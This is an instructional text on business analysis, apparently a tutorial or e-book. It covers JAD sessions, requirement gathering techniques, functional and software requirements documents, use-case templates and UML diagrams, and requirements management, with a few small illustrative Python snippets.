- Develop sound business cases and more realistic estimations of resources and business benefits.
- Prepare better reports on project scoping, planning and management in terms of costs and schedule, especially for large-scale IT projects.
- Produce clear and concise requirements, which in turn helps provide clearer and more accurate requirements if the IT project is outsourced.
- Elicit the real business needs from users and effectively manage user expectations.
- Improve the quality of design for the proposed IT system so that it meets the user requirements.
- Ensure the quality of the system developed before passing it on to end-users for review and acceptance.
- Arrange comprehensive quality tests on the delivered systems and provide feedback to the technical IT people.
A Business Analyst should be familiar with various analytical tools and related technologies while wearing the BA hat, that is, while holding this position.

As we have already learnt, business analysis is a process of trying to understand a business enterprise, identifying opportunities and problem areas, and meeting a wide range of people with a wide range of roles and responsibilities, such as CEOs, VPs and Directors, to understand their business requirements.

Fundamentally, there are three types of business analysis:

- **Strategic Analysis**: Strategic business analysis deals with pre-project work. It is the method or process of identifying business problems and devising business strategies, goals and objectives for the top management. It provides management information reporting for an effective decision-making process.
- **Tactical Analysis**: It involves knowledge of specific business analysis techniques to apply at the right time in the appropriate project.
- **Operational Analysis**: In this type of business analysis, we focus on the business aspect by leveraging information technology. It is also a process of studying operational systems with the aim of identifying opportunities for business improvement.

For each type of analysis, there is a set of tools available in the market, to be used based on organizational needs and requirements. However, to turn business requirements into understandable information, a good BA will leverage techniques such as fact-finding, interviews, documentation review, questionnaires, sampling and research in their day-to-day activities.

**Functional and Non-Functional Requirements**

We can break down requirements into two principal types: functional and non-functional requirements. For all technology projects, functional and non-functional requirements must be segregated and analyzed separately.
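To illustrate the split, the distinction between functional and non-functional requirements can be sketched as a toy requirements list; the IDs and wording below are invented for the example and are not from any real project:

```python
# A hypothetical requirements list, tagged by type.
# "functional"     = what the system must do
# "non_functional" = how well it must do it (quality attributes)
requirements = [
    {"id": "FR-1", "type": "functional",
     "text": "The system shall allow a user to place an order."},
    {"id": "FR-2", "type": "functional",
     "text": "The system shall email an order confirmation."},
    {"id": "NFR-1", "type": "non_functional",
     "text": "Order pages shall load within 2 seconds."},
    {"id": "NFR-2", "type": "non_functional",
     "text": "The system shall be available 99.9% of the time."},
]

def by_type(reqs, kind):
    """Return the IDs of all requirements of the given type."""
    return [r["id"] for r in reqs if r["type"] == kind]

print(by_type(requirements, "functional"))      # ['FR-1', 'FR-2']
print(by_type(requirements, "non_functional"))  # ['NFR-1', 'NFR-2']
```

Keeping the two types tagged separately like this is one simple way to honor the rule that they must be segregated and analyzed on their own.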
Defining the proper tool and an appropriate technique can be a daunting challenge, whether you are building a brand-new application or making changes to an existing one. Choosing the right technique for the functional process is an art by itself.

Below is an overview of the widely used business analysis techniques currently in the market:

<table>
<thead>
<tr>
<th>Processes</th>
<th>Techniques</th>
<th>Process Deliverables (Outcomes)</th>
</tr>
</thead>
<tbody>
<tr>
<td>To Determine Functional and Non-Functional Requirements</td>
<td>• JAD Sessions<br>• Scenarios and Use-cases<br>• Organizational Modeling<br>• Scope Modeling<br>• Functional Decomposition<br>• Interviews<br>• Observation (Job Shadowing)<br>• Focus Groups<br>• Acceptance and Evaluation<br>• Sequence Diagrams<br>• User Stories<br>• Brainstorming<br>• Storyboarding<br>• Prototyping<br>• Structured Walk-through<br>• Event Analysis<br>• Business Rule Analysis<br>• Requirements Workshops<br>• Risk Analysis<br>• Root Cause Analysis</td>
<td>Business Requirements Documents:<br>• Business and Functional Requirements<br>• Non-Functional Requirements<br>• Business Rules<br>• Requirements Traceability Matrix<br><br>Common Template:<br>• Business Requirements Document</td>
</tr>
</tbody>
</table>

**Applicability of Tools and Processes**

Although there is a variety of tools and procedures available to business analysts, it all depends on the current practices of the organization and how it would like to use them. For example, root-cause analysis is used when there is a need to go deeper into a certain important area or function. However, the business requirements document is the most popular and accepted way to put the requirements in documentation format.

In the subsequent chapters, we will discuss some of the above techniques in depth.

Joint Application Development (JAD) is a process used to collect business requirements while developing new information systems for a company. The JAD process may also include approaches for enhancing user participation, expediting development and improving the quality of specifications.
The intention of a JAD session is to pool subject matter experts, business analysts and IT specialists together to bring out solutions. A business analyst is the one who interacts with the entire group, gathers the information, analyzes it and produces a document. He plays a very important role in a JAD session.

**Use of a JAD Session**

JAD sessions are highly structured, facilitated workshops that bring together customer decision makers and IT staff to produce high-quality deliverables in a short period. In other words, a JAD session enables customers and developers to quickly come to an agreement on the basic scope, objectives and specifications of a project or, failing an agreement, to conclude that the project needs to be re-evaluated.

Simply put, JAD sessions can:

- **Simplify**: Consolidate months of meetings and phone calls into a structured workshop.
- **Identify**: Issues and participants.
- **Quantify**: Information and processing needs.
- **Clarify**: Crystallize and clarify all requirements agreed upon in the session.
- **Unify**: The output from one phase of development is input to the next.
- **Satisfy**: The customers define the system; therefore, it is their system. Shared participation brings a share in the outcome; they become committed to the system's success.

**Participants in a JAD Session**

The participants involved in a JAD session are as follows:

**Executive Sponsor**

An executive sponsor is the person who drives the project, the system owner. Executive sponsors normally hold senior positions and are able to make decisions and provide the necessary strategy, planning and direction.

**Subject Matter Expert**

These are the business users and outside experts who are required for a successful workshop. The subject matter experts are the backbone of the JAD session. They will drive the changes.

**Facilitator**

He chairs the meeting and identifies issues that can be solved as part of the meeting. The facilitator does not contribute information to the meeting.
**Key Users**

The terms key user and super user are sometimes used interchangeably, and their meaning still differs from company to company. Key users are generally the business users who are more tightly aligned to the IT project and are responsible for configuring the profiles of their team members during the project.

For example, suppose John is a key user and Nancy and Evan are users of a SAP system. In this instance, Nancy and Evan do not have access to change functionality and profiles, whereas John, being a key user, has access to edit profiles with more authorizations.

---

The JAD approach, in comparison with the more traditional practice, is thought to lead to faster development times and greater client satisfaction, because the client is involved throughout the development process. In the traditional approach to systems development, by comparison, the developer investigates the system requirements and develops an application, with client input consisting of a series of interviews.

6. Requirement Gathering Techniques

Techniques describe how tasks are performed under specific circumstances. A task may have zero, one, or more related techniques. A technique should be related to at least one task.

The following are some of the well-known requirements gathering techniques:

**Brainstorming**

Brainstorming is used in requirements gathering to get as many ideas as possible from a group of people. It is generally used to identify possible solutions to problems and to clarify details of opportunities.

**Document Analysis**

Reviewing the documentation of an existing system can help when creating an AS-IS process document, as well as drive the gap analysis for scoping migration projects. In an ideal world, we would even be reviewing the requirements that drove the creation of the existing system, a starting point for documenting current requirements.
Nuggets of information are often buried in existing documents that help us ask questions as part of validating requirement completeness.

**Focus Group**

A focus group is a gathering of people who are representative of the users or customers of a product, convened to get feedback. The feedback can be gathered about needs, opportunities or problems to identify requirements, or it can be gathered to validate and refine already elicited requirements. This form of market research is distinct from brainstorming in that it is a managed process with specific participants.

**Interface Analysis**

Interfaces for a software product can be human or machine. Integration with external systems and devices is just another interface. User-centric design approaches are very effective at making sure that we create usable software. Interface analysis, reviewing the touch points with other external systems, is important to make sure we do not overlook requirements that are not immediately visible to users.

**Interview**

Interviews of stakeholders and users are critical to creating great software. Without understanding the goals and expectations of the users and stakeholders, we are very unlikely to satisfy them. We also have to recognize the perspective of each interviewee, so that we can properly weigh and address their inputs. Listening is the skill that helps a great analyst get more value from an interview than an average analyst.

**Observation**

By observing users, an analyst can identify a process flow, steps, pain points and opportunities for improvement. Observations can be passive or active (asking questions while observing). Passive observation is better for getting feedback on a prototype (to refine requirements), while active observation is more effective at getting an understanding of an existing business process. Either approach can be used.

**Prototyping**

Prototyping is a relatively modern technique for gathering requirements.
In this approach, you gather preliminary requirements that you use to build an initial version of the solution, a prototype. You show this to the client, who then gives you additional requirements. You change the application and cycle around with the client again. This repetitive process continues until the product meets a critical mass of business needs or for an agreed number of iterations.

**Requirement Workshops**

Workshops can be very effective for gathering requirements. More structured than a brainstorming session, a workshop brings the involved parties together to collaborate on documenting the requirements. One way to capture the collaboration is the creation of domain-model artifacts (like static diagrams and activity diagrams). A workshop will be more effective with two analysts than with one.

**Reverse Engineering**

When a migration project does not have access to sufficient documentation of the existing system, reverse engineering will identify what the system does. It will not identify what the system should do, and will not identify when the system does the wrong thing.

**Survey/Questionnaire**

When collecting information from many people, too many to interview within budget and time constraints, a survey or questionnaire can be used. The survey can force users to select from choices, rate something ("Agree strongly, agree..."), or answer open-ended questions allowing free-form responses. Survey design is hard: questions can bias the respondents.

The Functional Requirements Document (FRD) is a formal statement of an application's functional requirements. It serves the same purpose as a contract: the developers agree to provide the capabilities specified, and the client agrees to find the product satisfactory if it provides the capabilities specified in the FRD.

Functional requirements capture the intended behavior of the system. This behavior may be expressed as services, tasks or functions the system is required to perform. The document should be tailored to fit a particular project's needs.
They define things such as system calculations, data manipulation and processing, user interface and interaction with the application.

The Functional Requirements Document (FRD) has the following characteristics:

- It demonstrates that the application provides value in terms of the business objectives and business processes in the next few years.
- It contains a complete set of requirements for the application. It leaves no room for anyone to assume anything which is not stated in the FRD.
- It is solution independent. The FRD is a statement of what the application is to do, not of how it works. The FRD does not commit the developers to a design. For that reason, any reference to the use of a specific technology is entirely inappropriate in an FRD.

The functional requirements should include the following:

- Descriptions of data to be entered into the system
- Descriptions of operations performed by each screen
- Descriptions of work-flows performed by the system
- Descriptions of system reports or other outputs
- Who can enter the data into the system
- How the system meets applicable regulatory requirements

The functional specification is designed to be read by a general audience. Readers should understand the system, but no technical knowledge should be required to understand this document.

**Functional Requirements Deliverables**

A Business Requirements Document (BRD) consists of:

- **Functional Requirements**: A document containing detailed requirements for the system being developed. These requirements define the functional features and capabilities that a system must possess. Be sure that any assumptions and constraints identified during the business case are still accurate and up to date.
- **Business Process Model**: A model of the current state of the process ("as is" model) or a concept of what the process should become ("to be" model).
- **System Context Diagram**: A context diagram shows the system boundaries, the external and internal entities that interact with the system, and the relevant data flows between these external and internal entities.
- **Flow Diagrams (as-is or to-be)**: Diagrams that graphically depict the sequence of operations or the movement of data for a business process. One or more flow diagrams are included depending on the complexity of the model.
- **Business Rules and Data Requirements**: Business rules define or constrain some aspects of the business and are used to define data constraints, default values, value ranges, cardinality, data types, calculations, exceptions, required elements and the relational integrity of the data.
- **Data Models**: Entity Relationship Diagrams, Entity Descriptions, Class Diagrams.
- **Conceptual Model**: A high-level display of the different entities for a business function and how they relate to one another.
- **Logical Model**: Illustrates the specific entities, attributes and relationships involved in a business function and represents all the definitions, characteristics, and relationships of data in a business, technical, or conceptual environment.
- **Data Dictionary and Glossary**: A collection of detailed information on the data elements, fields, tables and other entities that comprise the data model underlying a database or similar data management system.
- **Stakeholder Map**: Identifies all the stakeholders who are affected by the proposed change and their influence/authority level over the requirements. This document is developed in the origination phase of the Project Management Methodology (PMM) and is owned by the Project Manager, but needs to be updated by the project team as new or changed stakeholders are identified throughout the process.
- **Requirements Traceability Matrix**: A table that illustrates the logical links between individual functional requirements and other types of system artifacts, including other functional requirements, use-cases/user stories, architecture and design elements, code modules, test cases, and business rules.

A Software Requirements Specification (SRS) is a document which is used as a communication medium between the customer and the developer. In its most basic form, it is a formal document for communicating the software requirements between the two. An SRS document concentrates on WHAT needs to be done and carefully avoids the solution (how to do it). It serves as a contract between the development team and the customer. The requirements at this stage are written using end-user terminology. If necessary, a formal requirement specification will later be developed from it.

The SRS is a complete description of the behavior of the system to be developed and may include a set of use-cases that describe the interactions the users will have with the software.

**Purpose of SRS**

The SRS is a communication tool between the customer/client, business analysts, system developers and maintenance teams. It can also be a contract between the purchaser and the supplier.

- It gives a firm foundation for the design phase
- Supports project management and control
- Helps in controlling the evolution of the system

A software requirements specification should be Complete, Consistent, Traceable, Unambiguous, and Verifiable.
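The Requirements Traceability Matrix described above can be pictured as a simple lookup from each requirement to the artifacts that realize and verify it. This is a minimal sketch; all the requirement, use-case and test-case IDs below are hypothetical:

```python
# A minimal, hypothetical Requirements Traceability Matrix:
# each requirement maps to the use-cases and test cases that
# trace back to it.
rtm = {
    "REQ-001": {"use_cases": ["UC-1.1"], "test_cases": ["TC-01", "TC-02"]},
    "REQ-002": {"use_cases": ["UC-1.2"], "test_cases": []},
}

def untested(matrix):
    """Return requirements with no linked test case -- a coverage gap."""
    return [req for req, links in matrix.items() if not links["test_cases"]]

print(untested(rtm))  # ['REQ-002']
```

Walking the matrix like this is exactly what makes requirements "Traceable": every requirement can be followed forward to the artifacts that implement and test it, and any gap is immediately visible.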
The following should be addressed in the system specification:

- Define the functions of the system
- Define the Hardware / Software Functional Partitioning
- Define the Performance Specification
- Define the Hardware / Software Performance Partitioning
- Define Safety Requirements
- Define the User Interface (user's manual)
- Provide Installation Drawings/Instructions

**Software Requirement Specification Template**

Revision History

<table>
<thead>
<tr>
<th>Date</th>
<th>Description</th>
<th>Author</th>
<th>Comments</th>
</tr>
</thead>
<tbody>
<tr>
<td>&lt;date&gt;</td>
<td>&lt;Version 1&gt;</td>
<td>&lt;Your Name&gt;</td>
<td>&lt;First Revision&gt;</td>
</tr>
</tbody>
</table>

Document Approval

The following software requirements specification has been accepted and approved by the following:

<table>
<thead>
<tr>
<th>Signature</th>
<th>Printed Name</th>
<th>Title</th>
<th>Date</th>
</tr>
</thead>
<tbody>
<tr>
<td>&lt;Your Name&gt;</td>
<td></td>
<td>Lead Software Eng.</td>
<td></td>
</tr>
<tr>
<td>David</td>
<td></td>
<td>Instructor</td>
<td></td>
</tr>
</tbody>
</table>

9. Use-Cases

The Use-case diagram is one of the nine diagrams of UML. Use-cases are not only important but a necessary requirement for software projects. They are used throughout the software life cycle; of the various phases in the development cycle, the one where use-cases are used most is the requirements gathering phase.

**What is a Use-Case?**

A use-case describes a sequence of actions, performed by a system, that provides value to an actor. The use-case describes the system's behavior under various conditions as it responds to a request from one of the stakeholders, called the primary actor. The actor is the "who" of the system, in other words, the end user.

In software and systems engineering, a use-case is a list of steps, typically defining interactions between a role (known in UML as an "actor") and a system, to achieve a goal. The actor can be a human or an external system.
A use-case specifies the flow of events in the system. It is concerned with what the system performs in order to carry out the sequence of actions.

**Benefits of a Use-Case**

A use-case provides the following benefits:

- It is an easy means of capturing the functional requirements with a focus on the value added to the user.
- Use-cases are relatively easy to write and read compared to traditional requirements methods.
- Use-cases force developers to think from the end user's perspective.
- Use-cases engage the user in the requirements process.

**The Anatomy of a Use-Case**

<table>
<thead>
<tr>
<th>Name</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>Name</td>
<td>Descriptive name that illustrates the purpose of the use-case.</td>
</tr>
<tr>
<td>Description</td>
<td>Describes what the use-case does in a couple of sentences.</td>
</tr>
<tr>
<td>Actor</td>
<td>Lists any actors that participate in the use-case.</td>
</tr>
<tr>
<td>Pre-condition</td>
<td>Conditions that must be met prior to starting the use-case.</td>
</tr>
<tr>
<td>Flow of events</td>
<td>Description of the interaction between the system and the actor; contains main flows and alternate flows.</td>
</tr>
<tr>
<td>Post Condition</td>
<td>Describes the state of the system after the use-case has run its course.</td>
</tr>
</tbody>
</table>

**Guidance for the Use-Case Template**

Document each use-case using the template given at the end of this chapter. This section provides a description of each section in the use-case template.

**Use-Case Identification**

- **Use-Case ID**: Give each use-case a unique numeric identifier, in hierarchical form: X.Y. Related use-cases can be grouped in the hierarchy. Functional requirements can be traced back to a labelled use-case.
- **Use-Case Name**: State a concise, results-oriented name for the use-case. These reflect the tasks the user needs to be able to accomplish using the system. Include an action verb and a noun. Some examples:

- View part number information.
- Manually mark hypertext source and establish a link to the target.
- Place an order for a CD with the updated software version.

**Use-Case History**

Here, we mention the names of the people who are the stakeholders of the use-case document.

- **Created By**: Supply the name of the person who initially documented this use-case.
- **Date Created**: Enter the date on which the use-case was initially documented.
- **Last Updated By**: Supply the name of the person who performed the most recent update to the use-case description.
- **Date Last Updated**: Enter the date on which the use-case was most recently updated.

**Use-Case Definition**

The following are the definitions of the key concepts of a use-case:

**Actor**

An actor is a person or other entity, external to the software system being specified, who interacts with the system and performs use-cases to accomplish tasks. Different actors often correspond to different user classes, or roles, identified from the customer community that will use the product. Name the actor(s) that will be performing this use-case.

**Description**

Provide a brief description of the reason for and outcome of this use-case, or a high-level description of the sequence of actions and the outcome of executing the use-case.

**Preconditions**

List any activities that must take place, or any conditions that must be true, before the use-case can be started. Number each precondition. Examples:

- User's identity has been authenticated.
- User's computer has sufficient free memory available to launch the task.

**Post Conditions**

Describe the state of the system at the conclusion of the use-case execution. Number each post condition. Examples:

- Document contains only valid SGML tags.
- Price of item in database has been updated with the new value.

**Priority**

Indicate the relative priority of implementing the functionality required to allow this use-case to be executed. The priority scheme used must be the same as that used in the software requirements specification.
Frequency of Use Estimate the number of times this use-case will be performed by the actors per some appropriate unit of time. Normal Course of Events Provide a detailed description of the user actions and system responses that will take place during execution of the use-case under normal, expected conditions. This dialog sequence will ultimately lead to accomplishing the goal stated in the use-case name and description. The description may be written as an answer to the hypothetical question, “How do I accomplish the task stated in the use-case name?” It is best done as a numbered list of actions performed by the actor, alternating with responses provided by the system. Alternative Courses Document other, legitimate usage scenarios that can take place within this use-case separately in this section. State the alternative course, and describe any differences in the sequence of steps that take place. Number each alternative course using the use-case ID as a prefix, followed by “AC” to indicate “Alternative Course”. Example: X.Y.AC.1. Exceptions Describe any anticipated error conditions that could occur during execution of the use-case, and define how the system is to respond to those conditions. Also, describe how the system is to respond if the use-case execution fails for some unanticipated reason. Number each exception using the use-case ID as a prefix, followed by “EX” to indicate “Exception”. Example: X.Y.EX.1. Includes List any other use-cases that are included ("called") by this use-case. Common functionality that appears in multiple use-cases can be split out into a separate use-case that is included by the ones that need that common functionality. Special Requirements Identify any additional requirements, such as nonfunctional requirements, for the use-case that may need to be addressed during design or implementation. These may include performance requirements or other quality attributes. 
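As an illustration of the numbering convention described above, the following small Python helper (a hypothetical sketch, not part of any template standard) derives alternative-course ("AC") and exception ("EX") identifiers from a use-case ID:

```python
# Sketch of the ID convention: derive "X.Y.AC.n" and "X.Y.EX.n" identifiers
# from a hierarchical use-case ID such as "3.1".

def course_id(use_case_id: str, kind: str, n: int) -> str:
    """Build an ID like '3.1.AC.2' (alternative course) or '3.1.EX.1' (exception)."""
    if kind not in ("AC", "EX"):
        raise ValueError("kind must be 'AC' or 'EX'")
    return f"{use_case_id}.{kind}.{n}"

print(course_id("3.1", "AC", 2))  # -> 3.1.AC.2
print(course_id("3.1", "EX", 1))  # -> 3.1.EX.1
```

Keeping the use-case ID as the prefix is what makes each alternative course and exception traceable back to its parent use-case.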
Assumptions List any assumptions that were made in the analysis that led to accepting this use-case into the product description and writing the use-case description. Notes and Issues List any additional comments about this use-case or any remaining open issues or TBDs (To Be Determined) that must be resolved. Identify who will resolve each issue, the due date, and what the resolution ultimately is. Change Management and Version Control Version control is the management of changes to documents, large websites, and other collections of information. Changes are usually identified by a number or letter code, termed the revision number or revision level. Each revision is associated with a timestamp and the person making the change. An important part of the Unified Modeling Language (UML) is its facilities for drawing use-case diagrams. Use-cases are used during the analysis phase of a project to identify and partition system functionality. They separate the system into actors and use-cases. Actors represent roles that can be played by users of the system. Those users can be humans, other computers, pieces of hardware, or even other software systems. The only criterion is that they must be external to the part of the system being partitioned into use-cases. They must supply stimuli to that part of the system, and they must receive outputs from it. Use-cases represent the activities that actors perform with the help of your system in pursuit of a goal. We need to define what those users (actors) need from the system. A use-case should reflect user needs and goals, and should be initiated by an actor. Actors participating in a business use-case should be connected to the use-case by association. **Drawing Use-Case Diagrams** The figure below shows what a use-case might look like in UML schematic form. The use-case itself looks like an oval. The actors are drawn as little stick figures. The actors are connected to the use-case with lines. 
![Use-Case Diagram Example](image-url) Use-case 1: Sales Clerk checks out an item - Customer sets item on counter. - «uses» Swipe UPC Reader. - System looks up the UPC code in the database, retrieving the item description and price. - System emits an audible beep. - System announces the item description and price over voice output. - System adds the price and item type to the current invoice. - System adds the price to the correct tax subtotal. So, the «uses» relationship is very much like a function call or a subroutine. A use-case that is used in this fashion is called an abstract use-case, because it cannot exist on its own but must be used by other use-cases. **Example — Withdrawal Use-Case** The goal of a customer in relation to our money vending machine (ATM) is to withdraw money. So, we add a **Withdrawal** use-case. Withdrawing money from the vending machine might involve a bank for the transactions to be made. So, we also add another actor – **Bank**. Both actors participating in the use-case should be connected to the use-case by association. The money vending machine provides the Withdrawal use-case for the Customer and Bank actors. --- **Scenario of a Typical Banking Transaction** **Relationships between Actors and Use-Cases** Use-cases can be organized using the following relationships: - Generalization - Association - Extend - Include **Generalization between Use-Cases** There may be instances where actors are associated with similar use-cases. In such cases, a child use-case inherits the properties and behavior of the parent use-case, and we generalize to show the inheritance of functions. Generalization is represented by a solid line with a large hollow triangle arrowhead. **Association between Use-Cases** Associations between actors and use-cases are indicated in use-case diagrams by solid lines. An association exists whenever an actor is involved with an interaction described by a use-case. **Extend** There are some functions that are triggered optionally. 
In such cases, the extend relationship is used and the extension rule is attached to it. The thing to remember is that the base use-case should be able to perform its function on its own, even if the extending use-case is not called. The extend relationship is shown as a dashed line with an open arrowhead directed from the extending use-case to the extended (base) use-case. The arrow is labeled with the keyword «extend». **Include** The include relationship is used to extract use-case fragments that are duplicated in multiple use-cases. It is also used to simplify a large use-case by splitting it into several use-cases, and to extract common parts of the behavior of two or more use-cases. The include relationship is shown by a dashed arrow with an open arrowhead from the base use-case to the included use-case. The arrow is labeled with the keyword «include». Use-cases deal only with the functional requirements for a system. Other requirements, such as business rules, quality of service requirements, and implementation constraints, must be represented separately. The diagram shown below is an example of a simple use-case diagram with all the elements marked. **Basic Principles for Successful Application of Use-cases** - Keep it simple by telling stories - Be productive without perfection - Understand the big picture - Identify reuse opportunities for use-cases - Focus on value - Build the system in slices - Deliver the system in increments - Adapt to meet the team’s needs Use-Case Template Here, we show a sample template of a use-case which a Business Analyst can fill in, so that the information is useful for the technical team to ascertain information about the project. 
<table> <thead> <tr> <th>Use-case ID:</th> <th></th> </tr> </thead> <tbody> <tr> <td>Use-case Name:</td> <td></td> </tr> <tr> <td>Created By:</td> <td>Last Updated By:</td> </tr> <tr> <td>Date Created:</td> <td>Date Last Updated:</td> </tr> <tr> <td>Actor:</td> <td></td> </tr> <tr> <td>Description:</td> <td></td> </tr> <tr> <td>Preconditions:</td> <td></td> </tr> <tr> <td>Post conditions:</td> <td></td> </tr> <tr> <td>Priority:</td> <td></td> </tr> <tr> <td>Frequency of Use:</td> <td></td> </tr> <tr> <td>Normal Course of Events:</td> <td></td> </tr> <tr> <td>Alternative Courses:</td> <td></td> </tr> <tr> <td>Exceptions:</td> <td></td> </tr> <tr> <td>Includes:</td> <td></td> </tr> <tr> <td>Special Requirements:</td> <td></td> </tr> <tr> <td>Assumptions:</td> <td></td> </tr> <tr> <td>Notes and Issues:</td> <td></td> </tr> </tbody> </table> Gathering software requirements is the foundation of the entire software development project; soliciting and gathering business requirements is a critical first step for every project. In order to bridge the gap between business and technical requirements, business analysts must fully understand the business needs within the given context, align these needs with the business objectives, and properly communicate the needs to both the stakeholders and the development team. Key stakeholders want someone who can explain customer/client requirements in plain English and help them understand the value at a high level. This is the Business Analyst's main focus area: mapping the documentation to the requirements, and communicating it in the best possible way. 
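To make the template above concrete, here is a minimal data-structure sketch in Python. The field names follow the template sections; the class itself, and its completeness rule, are illustrative assumptions rather than part of any standard:

```python
# Hypothetical sketch: the use-case template captured as a dataclass, so that
# use-cases can be stored and checked programmatically. Field names mirror the
# template; the is_complete() rule is an illustrative assumption.
from dataclasses import dataclass, field
from typing import List

@dataclass
class UseCase:
    use_case_id: str                    # unique hierarchical ID, e.g. "1.2"
    name: str                           # concise, results-oriented name
    actors: List[str]                   # actors performing this use-case
    description: str = ""
    preconditions: List[str] = field(default_factory=list)
    postconditions: List[str] = field(default_factory=list)
    priority: str = ""
    normal_course: List[str] = field(default_factory=list)
    alternative_courses: List[str] = field(default_factory=list)
    exceptions: List[str] = field(default_factory=list)
    includes: List[str] = field(default_factory=list)

    def is_complete(self) -> bool:
        # Treat a use-case as reviewable only once it has an ID, a name,
        # at least one actor, and a normal course of events.
        return bool(self.use_case_id and self.name
                    and self.actors and self.normal_course)

uc = UseCase("1.1", "Withdraw money", ["Customer", "Bank"],
             normal_course=["Customer inserts card", "System dispenses cash"])
print(uc.is_complete())  # -> True
```

Storing use-cases in a structure like this also makes the later traceability work easier, since each requirement can reference a `use_case_id`.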
**Why Projects Fail** There are many reasons why projects fail, but some of the common areas include the following: - Market and Strategy Failures - Organizational and Planning Failures - Quality Failures - Leadership and Governance Failures - Skills, Knowledge and Competency Failures - Engagement, Teamwork and Communication Failures **Major Issues** - Too often, projects fail due to poorly managed requirements. - Complex and changing requirements create communication hurdles. At the core of the issue is that projects are increasingly complex, changes occur, and communication is challenging. **Why Successful Teams do Requirements Management** Requirements management is about keeping your team in sync and providing visibility into what is going on within a project. It is critical to the success of your projects for your whole team to understand what you are building and why – that’s how we define requirements management. The “why” is important because it provides context to the goals, feedback and decisions being made about the requirements. This increases the predictability of future success and potential problems, allowing your team to quickly course-correct any issues and successfully complete your project on time and within budget. As a starting point, it’s valuable for everyone involved to have a basic understanding of what requirements are, and how to manage them. **Let’s Start with the Basics** A requirement is a condition or capability needed by a stakeholder to solve a problem or achieve an objective – a condition or capability that must be met or possessed by a system or system component to satisfy a contract, standard, specification, or other formally imposed document. A requirement can be expressed with text, sketches, detailed mockups or models – whatever information best communicates to an engineer what to build, and to a QA manager what to test. Depending on your development process, you might use different terminology to capture requirements. 
High-level requirements are sometimes referred to simply as needs or goals. Within software development practices, requirements might be referred to as “use-cases”, “features” or “functional requirements”. More specifically, within agile development methodologies, requirements are often captured as epics and stories. Regardless of what your team calls them or what process you use, requirements are essential to the development of all products. Without clearly defined requirements, you could produce an incomplete or defective product. Throughout the process, there can be many people involved in defining requirements. A stakeholder might request a feature that describes how the product will provide value in solving a problem. A designer might define a requirement based on how the final product should look or perform from a usability or user interface standpoint. A business analyst might create a system requirement that adheres to specific technical or organizational constraints. For today’s sophisticated products and software applications, it often takes hundreds or thousands of requirements to sufficiently define the scope of a project or a release. Thus, it is imperative that the team be able to access, collaborate on, update, and test each requirement through to completion, as requirements naturally change and evolve during the development process. Now that we’ve defined the value of requirements management at a high level, let’s go deeper into the four fundamentals that every team member and stakeholder can benefit from understanding: - Planning good requirements: “What the heck are we building?” - Collaboration and buy-in: “Just approve the spec, already!” - Traceability & change management: “Wait, do the developers know that changed?” - Quality assurance: “Hello, did anyone test this thing?” Does everyone know what we’re building and why? That’s the value of requirements management. 
**Collaboration & Buy-In from Stakeholders** Is everyone in the loop? Do we have approval on the requirements to move forward? These questions come up during development cycles. It would be great if everyone could agree on the requirements, but for large projects with many stakeholders, this does not usually happen. Trying to get everyone in agreement can cause decisions to be delayed, or worse, not made at all. Gaining consensus on every decision is not always easy. In practice, you don’t necessarily want “consensus” – you want “buy-in” from the group and approval from those in control, so you can move the project forward. With consensus, you are trying to get everyone to compromise and agree on the decision. With buy-in, you are trying to get people to back the best solution, make a smart decision, and do what is necessary to move forward. You don’t need everyone to agree that the decision is the best. You need everyone to support the decision. Team collaboration can help in gaining support for decisions and in planning good requirements. Collaborative teams work hard to make sure everyone has a stake in projects and provides feedback. Collaborative teams continuously share ideas, typically have better communication, and tend to support the decisions made, because there is a shared sense of commitment to and understanding of the goals of the project. It is when developers, testers, or other stakeholders feel “out of the loop” that communication issues arise, people get frustrated and projects get delayed. Once everyone has bought in to the scope of work, it is imperative for the requirements to be clear and well documented. Keeping track of all the requirements is where things get tricky. Imagine having a to-do list a mile long that involves collaborating with multiple people to complete. How would you keep all those items straight? How would you track how one change to an item would affect the rest of the project? This is where traceability and change management add value. 
So, what makes a good requirement? A good requirement should be valuable and actionable; it should define a need as well as provide a pathway to a solution. Everyone on the team should understand what it means. Requirements vary in complexity. - Requirements can be part of a group, with high-level requirements broken down into sub-requirements. - They may also include very detailed specifications that include a set of functional requirements describing the behavior or components of the end-product. - Good requirements are concise and specific, and should answer the question, “What do we need?” rather than, “How do we fulfil the need?” - Good requirements ensure that all stakeholders understand their part of the plan; if parts are unclear or misinterpreted, the final product could be defective or fail. Failure or misinterpretation of requirements can be prevented by receiving feedback from the team continuously throughout the process as requirements evolve. Continuous collaboration and buy-in from everyone is a key to success. **Requirement Gathering and Analysis** A requirement is a condition or capability needed by a stakeholder to solve a problem or achieve an organizational objective; a condition or capability that must be met or possessed by a system. *Requirement analysis* in software engineering covers the tasks that go into determining the needs or conditions to be met by a new or altered product, taking account of the possibly conflicting requirements of various stakeholders, and analyzing, documenting, validating and managing software or system requirements. The requirements should be: - Documented - Actionable - Measurable - Testable - Traceable Requirements should be related to identified business needs or opportunities, and defined to a level of detail sufficient for system design. 
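The five qualities listed above can be turned into a simple checklist. The following toy Python sketch (the record layout is an illustrative assumption, not a standard schema) flags which qualities a requirement record is still missing:

```python
# Hypothetical sketch: check a requirement record against the qualities named
# above (documented, actionable, measurable, testable, traceable) and report
# the ones that are not yet satisfied.

QUALITIES = ["documented", "actionable", "measurable", "testable", "traceable"]

def missing_qualities(req: dict) -> list:
    """Return the qualities this requirement record does not yet satisfy."""
    return [q for q in QUALITIES if not req.get(q)]

req = {"id": "FR-12", "text": "The system shall log every withdrawal.",
       "documented": True, "actionable": True,
       "measurable": False, "testable": True, "traceable": False}
print(missing_qualities(req))  # -> ['measurable', 'traceable']
```

A checklist like this is most useful during review, before signoff, when gaps are still cheap to fix.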
